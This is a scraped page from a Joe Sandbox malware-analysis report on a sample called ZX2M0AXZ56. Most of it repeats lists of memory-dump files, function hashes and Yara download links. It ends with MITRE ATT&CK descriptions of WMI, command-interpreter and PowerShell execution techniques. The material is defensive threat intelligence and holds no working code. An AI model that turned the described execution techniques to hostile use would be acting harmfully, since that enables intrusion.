Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 86282ddb84d986bf482cdafd316ec1bd3b0469837a10f03fcc46918e6d54bead
Instruction ID: 979270066c58e580823043e6cdb1203cfe1c3dc0cd32651836fdf67459a7b30f
Opcode Fuzzy Hash: 86282ddb84d986bf482cdafd316ec1bd3b0469837a10f03fcc46918e6d54bead
Instruction Fuzzy Hash: 310126F1B002664BE724DE5AECC073F7756A7D5712F1D817AD484A7305D2348C528299

Function 004DC850 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5086e87323c10ce3a6221161c1813e498cb72536d422862ba5604c7f1492a252
Instruction ID: 96a48cb4feefded06c9b55c64d8c6b7a9cc6c2cc2fc15ed29888803c948660df
Opcode Fuzzy Hash: 5086e87323c10ce3a6221161c1813e498cb72536d422862ba5604c7f1492a252
Instruction Fuzzy Hash: 21F090254086C38ADB059E2980B0B72FBA1AF63349F1D11DED4C1AB393DB1AD85AD758

Function 004DE0DA Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
Instruction ID: 8b7a2b4c166fdb3d48a62bb880509e0509666f4597344d64eaf62b1a72741bf0
Opcode Fuzzy Hash: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
Instruction Fuzzy Hash: 52F065105087E28ADB234B3E44706B3AFE09B63120B181BD7C8E19B3C7C3199497C36A

Function 0050C06D Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daca7f89ba65bcf5e242fe72db38e5ec9b4c3f9b9508f718a3c784c32f165994
Instruction ID: b55d9d3d77fa52e4a5b4b9a5a9aef73e3addeaf0ed917bb509c60d7b896e63b1
Opcode Fuzzy Hash: daca7f89ba65bcf5e242fe72db38e5ec9b4c3f9b9508f718a3c784c32f165994
Instruction Fuzzy Hash: F201E27010428EDFEB14AF24D44ABAE7BB5FF51306F640C0EE882418D1CBB60CA4CA1A

Function 004BC805 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2224104260.00000000004B1000.00000040.00000001.01000000.00000004.sdmp, Offset: 004B0000, based on PE: true

Associated: 00000005.00000002.2224080854.00000000004B0000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224104260.00000000004F5000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224181969.0000000000505000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224209201.000000000050F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2224240043.0000000000510000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2225291886.0000000000511000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226189454.0000000000667000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226233536.0000000000669000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226272697.000000000067F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226323228.0000000000680000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.0000000000682000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226356827.000000000068B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226468789.00000000006A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226510209.00000000006A2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226546451.00000000006A4000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226598348.00000000006A6000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226646950.00000000006BD000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226674291.00000000006BE000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226715100.00000000006C1000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226752674.00000000006D4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226802845.00000000006EA000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226842232.00000000006ED000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226866882.00000000006EE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226930910.00000000006F2000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226966213.00000000006F3000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2226994315.00000000006F4000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227025296.00000000006FC000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227062533.00000000006FD000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227087749.00000000006FE000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227114102.0000000000703000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227139414.0000000000704000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227166211.0000000000709000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227191509.0000000000711000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2227217835.0000000000714000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228196112.0000000000721000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228231721.0000000000729000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228256500.000000000072A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228285488.000000000072B000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228346256.000000000072C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228411925.000000000072F000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228484856.0000000000730000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228581348.0000000000732000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228614154.0000000000740000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228648027.0000000000743000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2228687913.0000000000768000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000769000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229100982.0000000000773000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229169222.0000000000799000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229197341.000000000079A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.000000000079B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229228644.00000000007A0000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229280139.00000000007B0000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.2229305809.00000000007B1000.00000080.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4b0000_ZX2M0AXZ56.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 768269465dc53fd6f02a48c219771cc6300ae6bcac6d1625ce0f6a7cbc488a8c
Instruction ID: 93610031251d163acd6b38a678270b0b236295708d92c5a71c1f3317e2fbd122
Opcode Fuzzy Hash: 768269465dc53fd6f02a48c219771cc6300ae6bcac6d1625ce0f6a7cbc488a8c
Instruction Fuzzy Hash: 2CC01274602840DFC2084F34DC08879B374AF0B102B006424D50BD3351CB21A532CA5D

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

